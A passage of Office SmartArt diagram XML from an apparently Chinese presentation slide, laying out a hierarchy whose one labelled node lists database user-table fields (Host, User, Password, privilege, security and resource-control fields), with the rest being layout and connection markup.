      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            <a:t>Host</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            <a:t>User</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            <a:t>Password</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
            <a:t>多个权限字段</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
            <a:t>安全字段</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
            <a:t>资源控制字段</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A229DC65-16E8-47E2-A833-D8E99F406405}" type="parTrans" cxnId="{1C2A6BF7-B858-4392-B694-079BB0CC9129}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B33FE169-DE82-4B1A-8308-C987081474C3}" type="sibTrans" cxnId="{1C2A6BF7-B858-4392-B694-079BB0CC9129}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{567785E4-5E69-4670-8EE8-F5992B300BBA}" type="pres">
      <dgm:prSet presAssocID="{CF9491C8-D125-4D73-8B66-51B8EF9B94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178C9C-3B64-4BD1-A38F-A82A96D4AF7B}" type="pres">
      <dgm:prSet presAssocID="{8A3089D0-658F-46EA-BD37-933545119994}" presName="root1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{43B560AB-BA9F-48FB-B2EC-F252F3AC5BF9}" type="pres">
      <dgm:prSet presAssocID="{8A3089D0-658F-46EA-BD37-933545119994}" presName="LevelOneTextNode" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1" custScaleX="58985" custScaleY="62584">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B07F22DA-5A56-4820-9404-B52290306DC4}" type="pres">
      <dgm:prSet presAssocID="{8A3089D0-658F-46EA-BD37-933545119994}" presName="level2hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AE55948D-7313-49E8-8713-84457763C076}" type="pres">
      <dgm:prSet presAssocID="{B39327E8-8966-4266-AF32-04F80DC9F625}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30A2F0D4-202D-4D6C-A984-636535011CAD}" type="pres">
      <dgm:prSet presAssocID="{B39327E8-8966-4266-AF32-04F80DC9F625}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78FE08C9-E864-40BE-9FC1-02A4199ED21D}" type="pres">
      <dgm:prSet presAssocID="{BB88B010-70A6-4849-BAA0-923BEBA44D94}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{723662F3-EEE4-4B81-8C6D-2F80A2BBCF50}" type="pres">
      <dgm:prSet presAssocID="{BB88B010-70A6-4849-BAA0-923BEBA44D94}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="2" custScaleY="92117">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{694B7F06-DC38-4DFD-950B-9AFC47DE2ECA}" type="pres">
      <dgm:prSet presAssocID="{BB88B010-70A6-4849-BAA0-923BEBA44D94}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C45A8441-C464-4588-9E5B-2D7B1643A132}" type="pres">
      <dgm:prSet presAssocID="{7ED19606-EDEE-4BFB-9B2A-4EBB244646F0}" presName="conn2-1" presStyleLbl="parChTrans1D3" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6740971-AC32-4447-9002-840010AEDB53}" type="pres">
      <dgm:prSet presAssocID="{7ED19606-EDEE-4BFB-9B2A-4EBB244646F0}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{05717139-7487-4A63-A236-D47EBBD8780A}" type="pres">
      <dgm:prSet presAssocID="{82133096-784D-46CA-9F4C-A98A454C5C98}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{611C6EAB-7EF2-459E-B6A3-D344F3DFB689}" type="pres">
      <dgm:prSet presAssocID="{82133096-784D-46CA-9F4C-A98A454C5C98}" presName="LevelTwoTextNode" presStyleLbl="node3" presStyleIdx="0" presStyleCnt="3" custScaleX="148213">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9AD07354-1CBE-4105-B12C-85308138F732}" type="pres">
      <dgm:prSet presAssocID="{82133096-784D-46CA-9F4C-A98A454C5C98}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6E9C960-1AE3-4B5D-A295-29418EE82707}" type="pres">
      <dgm:prSet presAssocID="{86DADEC9-AEA7-47A7-A73E-7B12A4CBDD28}" presName="conn2-1" presStyleLbl="parChTrans1D3" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BF8C181-97A0-4A2D-92E7-B53027B0566E}" type="pres">
      <dgm:prSet presAssocID="{86DADEC9-AEA7-47A7-A73E-7B12A4CBDD28}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{47494707-1DB9-4F91-9D82-1A78AB7A57DE}" type="pres">
      <dgm:prSet presAssocID="{0FACC8EC-DAB0-4965-8EB3-926C53C4A5A2}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{143581EA-6E8C-4CB2-A1EA-64C218E74477}" type="pres">
      <dgm:prSet presAssocID="{0FACC8EC-DAB0-4965-8EB3-926C53C4A5A2}" presName="LevelTwoTextNode" presStyleLbl="node3" presStyleIdx="1" presStyleCnt="3" custScaleX="151811">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{03157A0F-42C3-4700-97F2-DFDAA86DEF17}" type="pres">
      <dgm:prSet presAssocID="{0FACC8EC-DAB0-4965-8EB3-926C53C4A5A2}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1543022A-AC84-444E-85BC-F75C8C579614}" type="pres">
      <dgm:prSet presAssocID="{81FADDCE-2246-4BF1-BF04-81AD84626EE9}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8582F221-99A8-4D46-B621-EC0B5D311F40}" type="pres">
      <dgm:prSet presAssocID="{81FADDCE-2246-4BF1-BF04-81AD84626EE9}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{27FF8E45-B952-4586-B79E-3EE2D25FE264}" type="pres">
      <dgm:prSet presAssocID="{0A4AC319-2C55-44C8-9A8B-48420734DD3C}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD4FEF7F-3FDD-4AC6-AF35-5C4D32ABAEAE}" type="pres">
      <dgm:prSet presAssocID="{0A4AC319-2C55-44C8-9A8B-48420734DD3C}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="1" presStyleCnt="2" custScaleY="77417">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B2AA292-D948-439E-8F7A-CA8921EA6373}" type="pres">
      <dgm:prSet presAssocID="{0A4AC319-2C55-44C8-9A8B-48420734DD3C}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E16D0ECE-6646-4E8E-A6C1-8CD80239E06E}" type="pres">
      <dgm:prSet presAssocID="{A229DC65-16E8-47E2-A833-D8E99F406405}" presName="conn2-1" presStyleLbl="parChTrans1D3" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1DB056D6-06E8-4A53-893A-8B96F9887CAC}" type="pres">
      <dgm:prSet presAssocID="{A229DC65-16E8-47E2-A833-D8E99F406405}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2197F2B8-4095-4634-A66C-3D838AAD0972}" type="pres">
      <dgm:prSet presAssocID="{38E454BF-1DBD-45FC-9964-693322103C0A}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{212DDA27-8250-49F3-80A4-007C0678F042}" type="pres">
      <dgm:prSet presAssocID="{38E454BF-1DBD-45FC-9964-693322103C0A}" presName="LevelTwoTextNode" presStyleLbl="node3" presStyleIdx="2" presStyleCnt="3" custScaleY="212006">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5FC4DA54-7506-494A-A1E9-9AC5F5E4518C}" type="pres">
      <dgm:prSet presAssocID="{38E454BF-1DBD-45FC-9964-693322103C0A}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{62B4E20A-4C44-4F32-B9F8-18817F96E1FE}" type="presOf" srcId="{0FACC8EC-DAB0-4965-8EB3-926C53C4A5A2}" destId="{143581EA-6E8C-4CB2-A1EA-64C218E74477}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{8E7B5410-DC09-46A6-87EA-ACCFDE30C8A1}" type="presOf" srcId="{7ED19606-EDEE-4BFB-9B2A-4EBB244646F0}" destId="{C45A8441-C464-4588-9E5B-2D7B1643A132}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{9267C629-C860-4141-B7FD-162102F0C540}" srcId="{CF9491C8-D125-4D73-8B66-51B8EF9B94A1}" destId="{8A3089D0-658F-46EA-BD37-933545119994}" srcOrd="0" destOrd="0" parTransId="{82E2AE2E-29CC-42A1-9E66-88E3F3D14858}" sibTransId="{70789FDE-CB91-443D-956B-C7376F9ABA78}"/>
    <dgm:cxn modelId="{416B382D-505B-43EC-A67F-DB2D7BB77266}" type="presOf" srcId="{82133096-784D-46CA-9F4C-A98A454C5C98}" destId="{611C6EAB-7EF2-459E-B6A3-D344F3DFB689}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{2EC9A92E-2FA1-4438-9B86-7A3FE74D7588}" type="presOf" srcId="{7ED19606-EDEE-4BFB-9B2A-4EBB244646F0}" destId="{D6740971-AC32-4447-9002-840010AEDB53}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{87F70C36-47AB-4904-9E99-5FE6A59F9BDA}" type="presOf" srcId="{8A3089D0-658F-46EA-BD37-933545119994}" destId="{43B560AB-BA9F-48FB-B2EC-F252F3AC5BF9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{53995B60-A510-4F6B-94AC-CA039B97DCA5}" srcId="{BB88B010-70A6-4849-BAA0-923BEBA44D94}" destId="{0FACC8EC-DAB0-4965-8EB3-926C53C4A5A2}" srcOrd="1" destOrd="0" parTransId="{86DADEC9-AEA7-47A7-A73E-7B12A4CBDD28}" sibTransId="{95E54326-0DB8-45CB-B76A-C9B65E75F706}"/>
    <dgm:cxn modelId="{4C57A841-734D-4480-B529-78328B8998B9}" type="presOf" srcId="{81FADDCE-2246-4BF1-BF04-81AD84626EE9}" destId="{1543022A-AC84-444E-85BC-F75C8C579614}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{5CB87E6A-CDEF-4BA0-A432-C0A18FBF4783}" type="presOf" srcId="{86DADEC9-AEA7-47A7-A73E-7B12A4CBDD28}" destId="{8BF8C181-97A0-4A2D-92E7-B53027B0566E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{03D9F570-1C98-4B93-8E79-5B3772849776}" srcId="{8A3089D0-658F-46EA-BD37-933545119994}" destId="{BB88B010-70A6-4849-BAA0-923BEBA44D94}" srcOrd="0" destOrd="0" parTransId="{B39327E8-8966-4266-AF32-04F80DC9F625}" sibTransId="{22E92F78-2516-47C7-820B-AD0F23AB0D22}"/>
    <dgm:cxn modelId="{E1C61A72-346B-4C31-BED3-B940DA8C417E}" type="presOf" srcId="{81FADDCE-2246-4BF1-BF04-81AD84626EE9}" destId="{8582F221-99A8-4D46-B621-EC0B5D311F40}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6CDF2D84-DD1F-45CF-973B-ED03A0FA530F}" type="presOf" srcId="{BB88B010-70A6-4849-BAA0-923BEBA44D94}" destId="{723662F3-EEE4-4B81-8C6D-2F80A2BBCF50}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B9FBA58A-7E48-4880-A5D9-942E6371FF3A}" type="presOf" srcId="{38E454BF-1DBD-45FC-9964-693322103C0A}" destId="{212DDA27-8250-49F3-80A4-007C0678F042}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{56AB36AC-FBD7-4F84-B617-5766440437D6}" type="presOf" srcId="{B39327E8-8966-4266-AF32-04F80DC9F625}" destId="{30A2F0D4-202D-4D6C-A984-636535011CAD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{038073B1-211D-4A73-905D-E6EC3D8B6E4D}" type="presOf" srcId="{0A4AC319-2C55-44C8-9A8B-48420734DD3C}" destId="{BD4FEF7F-3FDD-4AC6-AF35-5C4D32ABAEAE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{E01C86B3-2C21-4634-8840-95F07D61C742}" srcId="{BB88B010-70A6-4849-BAA0-923BEBA44D94}" destId="{82133096-784D-46CA-9F4C-A98A454C5C98}" srcOrd="0" destOrd="0" parTransId="{7ED19606-EDEE-4BFB-9B2A-4EBB244646F0}" sibTransId="{CD39DCA7-7F8C-4E34-8E54-AEB08378E4C7}"/>
    <dgm:cxn modelId="{D0B1CABC-EC41-4395-A67C-70A49D969458}" type="presOf" srcId="{B39327E8-8966-4266-AF32-04F80DC9F625}" destId="{AE55948D-7313-49E8-8713-84457763C076}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C5BC5AC0-1581-438F-BA78-3D9B64F3ABB1}" type="presOf" srcId="{86DADEC9-AEA7-47A7-A73E-7B12A4CBDD28}" destId="{A6E9C960-1AE3-4B5D-A295-29418EE82707}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{758041D9-FD7D-4D18-8196-AB08787D3FAA}" type="presOf" srcId="{A229DC65-16E8-47E2-A833-D8E99F406405}" destId="{E16D0ECE-6646-4E8E-A6C1-8CD80239E06E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{0A34A8E0-EA16-448A-B709-F9F5DE02D97E}" srcId="{8A3089D0-658F-46EA-BD37-933545119994}" destId="{0A4AC319-2C55-44C8-9A8B-48420734DD3C}" srcOrd="1" destOrd="0" parTransId="{81FADDCE-2246-4BF1-BF04-81AD84626EE9}" sibTransId="{B4BA8921-5C6D-4DD3-A2CD-B00473D43B82}"/>
    <dgm:cxn modelId="{C5C610E9-E2DD-46B0-9128-4EF1A438B413}" type="presOf" srcId="{CF9491C8-D125-4D73-8B66-51B8EF9B94A1}" destId="{567785E4-5E69-4670-8EE8-F5992B300BBA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{0A990BEA-07D7-43C5-9048-79C0008A627B}" type="presOf" srcId="{A229DC65-16E8-47E2-A833-D8E99F406405}" destId="{1DB056D6-06E8-4A53-893A-8B96F9887CAC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{1C2A6BF7-B858-4392-B694-079BB0CC9129}" srcId="{0A4AC319-2C55-44C8-9A8B-48420734DD3C}" destId="{38E454BF-1DBD-45FC-9964-693322103C0A}" srcOrd="0" destOrd="0" parTransId="{A229DC65-16E8-47E2-A833-D8E99F406405}" sibTransId="{B33FE169-DE82-4B1A-8308-C987081474C3}"/>
    <dgm:cxn modelId="{758F9141-9E01-4CCD-8AE9-B117A47144A0}" type="presParOf" srcId="{567785E4-5E69-4670-8EE8-F5992B300BBA}" destId="{29178C9C-3B64-4BD1-A38F-A82A96D4AF7B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{55270D2E-B171-47E4-B879-1AF162ECCD89}" type="presParOf" srcId="{29178C9C-3B64-4BD1-A38F-A82A96D4AF7B}" destId="{43B560AB-BA9F-48FB-B2EC-F252F3AC5BF9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{28106BB0-C9E4-4F25-A3E6-CDF8337F8088}" type="presParOf" srcId="{29178C9C-3B64-4BD1-A38F-A82A96D4AF7B}" destId="{B07F22DA-5A56-4820-9404-B52290306DC4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6A8689DD-94C4-4E8C-BF33-C1091A6F6D9E}" type="presParOf" srcId="{B07F22DA-5A56-4820-9404-B52290306DC4}" destId="{AE55948D-7313-49E8-8713-84457763C076}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{E14EF371-539F-4DE5-8ABF-25849944E0BE}" type="presParOf" srcId="{AE55948D-7313-49E8-8713-84457763C076}" destId="{30A2F0D4-202D-4D6C-A984-636535011CAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{25327B43-820E-4A3D-8647-AFCEEF2033D2}" type="presParOf" srcId="{B07F22DA-5A56-4820-9404-B52290306DC4}" destId="{78FE08C9-E864-40BE-9FC1-02A4199ED21D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6E20D087-5C32-4AA2-A125-09A631AAB2FB}" type="presParOf" srcId="{78FE08C9-E864-40BE-9FC1-02A4199ED21D}" destId="{723662F3-EEE4-4B81-8C6D-2F80A2BBCF50}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{3DD630EF-A2FC-4EC9-B18E-220BF029B2E7}" type="presParOf" srcId="{78FE08C9-E864-40BE-9FC1-02A4199ED21D}" destId="{694B7F06-DC38-4DFD-950B-9AFC47DE2ECA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6C8CBA96-3B58-43DD-8CB2-28E83DFB0F2A}" type="presParOf" srcId="{694B7F06-DC38-4DFD-950B-9AFC47DE2ECA}" destId="{C45A8441-C464-4588-9E5B-2D7B1643A132}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{8E3ED472-ECCE-48E3-9661-0A6C9996CEC3}" type="presParOf" srcId="{C45A8441-C464-4588-9E5B-2D7B1643A132}" destId="{D6740971-AC32-4447-9002-840010AEDB53}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6AEC1A48-E255-4EA8-8CB0-50E3CFB2DD71}" type="presParOf" srcId="{694B7F06-DC38-4DFD-950B-9AFC47DE2ECA}" destId="{05717139-7487-4A63-A236-D47EBBD8780A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{F495621D-5372-4FB7-9D62-C43EEE09CE76}" type="presParOf" srcId="{05717139-7487-4A63-A236-D47EBBD8780A}" destId="{611C6EAB-7EF2-459E-B6A3-D344F3DFB689}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{4B327675-A488-4760-9247-CBB24879BE89}" type="presParOf" srcId="{05717139-7487-4A63-A236-D47EBBD8780A}" destId="{9AD07354-1CBE-4105-B12C-85308138F732}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{4CDDA373-92CF-470D-8366-1F6B635CEDA8}" type="presParOf" srcId="{694B7F06-DC38-4DFD-950B-9AFC47DE2ECA}" destId="{A6E9C960-1AE3-4B5D-A295-29418EE82707}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{F9151468-FEB6-4752-BFC3-FAC13B38BF28}" type="presParOf" srcId="{A6E9C960-1AE3-4B5D-A295-29418EE82707}" destId="{8BF8C181-97A0-4A2D-92E7-B53027B0566E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{5F7F6D0C-DF91-4522-B361-DDBE9AC41195}" type="presParOf" srcId="{694B7F06-DC38-4DFD-950B-9AFC47DE2ECA}" destId="{47494707-1DB9-4F91-9D82-1A78AB7A57DE}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{849F01F0-B1B1-4BD5-A9F0-A270D934B52A}" type="presParOf" srcId="{47494707-1DB9-4F91-9D82-1A78AB7A57DE}" destId="{143581EA-6E8C-4CB2-A1EA-64C218E74477}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{DABBA9B5-AA23-40E2-94EC-6337B9186DD8}" type="presParOf" srcId="{47494707-1DB9-4F91-9D82-1A78AB7A57DE}" destId="{03157A0F-42C3-4700-97F2-DFDAA86DEF17}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{29987FDB-468E-4C5D-B0EF-ABDBE9F78C7C}" type="presParOf" srcId="{B07F22DA-5A56-4820-9404-B52290306DC4}" destId="{1543022A-AC84-444E-85BC-F75C8C579614}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{19EE13BF-FEA3-45B3-BF2E-73F3EF01D2DE}" type="presParOf" srcId="{1543022A-AC84-444E-85BC-F75C8C579614}" destId="{8582F221-99A8-4D46-B621-EC0B5D311F40}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7EE33A76-C3D9-4821-9B4E-8B45293C074E}" type="presParOf" srcId="{B07F22DA-5A56-4820-9404-B52290306DC4}" destId="{27FF8E45-B952-4586-B79E-3EE2D25FE264}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{35EF29FF-F8AE-4E2A-B03E-CF9647ABD9C8}" type="presParOf" srcId="{27FF8E45-B952-4586-B79E-3EE2D25FE264}" destId="{BD4FEF7F-3FDD-4AC6-AF35-5C4D32ABAEAE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{9AB58801-2088-4D76-89C2-A9145343426E}" type="presParOf" srcId="{27FF8E45-B952-4586-B79E-3EE2D25FE264}" destId="{5B2AA292-D948-439E-8F7A-CA8921EA6373}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{F4EE3AAD-1BF9-49F0-AA60-748E5300F46F}" type="presParOf" srcId="{5B2AA292-D948-439E-8F7A-CA8921EA6373}" destId="{E16D0ECE-6646-4E8E-A6C1-8CD80239E06E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B54BE300-D43A-480A-B48F-56759992C59C}" type="presParOf" srcId="{E16D0ECE-6646-4E8E-A6C1-8CD80239E06E}" destId="{1DB056D6-06E8-4A53-893A-8B96F9887CAC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B6A465F0-FB98-4F35-A9CC-D456D1593D16}" type="presParOf" srcId="{5B2AA292-D948-439E-8F7A-CA8921EA6373}" destId="{2197F2B8-4095-4634-A66C-3D838AAD0972}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B2422649-8DCA-4CA4-B851-A07DBDE18A6B}" type="presParOf" srcId="{2197F2B8-4095-4634-A66C-3D838AAD0972}" destId="{212DDA27-8250-49F3-80A4-007C0678F042}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{EAEE025C-EAA5-477B-8562-EE69A4176B61}" type="presParOf" srcId="{2197F2B8-4095-4634-A66C-3D838AAD0972}" destId="{5FC4DA54-7506-494A-A1E9-9AC5F5E451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D111E-69BF-4BA6-80F2-99AE6EBD57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BFC07A-CEE6-46B7-9CE5-63E9FD9C665C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9A594DB2-8872-4854-8CBF-002B4AE223B4}" type="parTrans" cxnId="{882C46C3-BFF2-49DF-AB96-002891E560F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}" type="sibTrans" cxnId="{882C46C3-BFF2-49DF-AB96-002891E560F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0A6EDCE-E53D-4EAD-8E8F-55116FFEB387}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
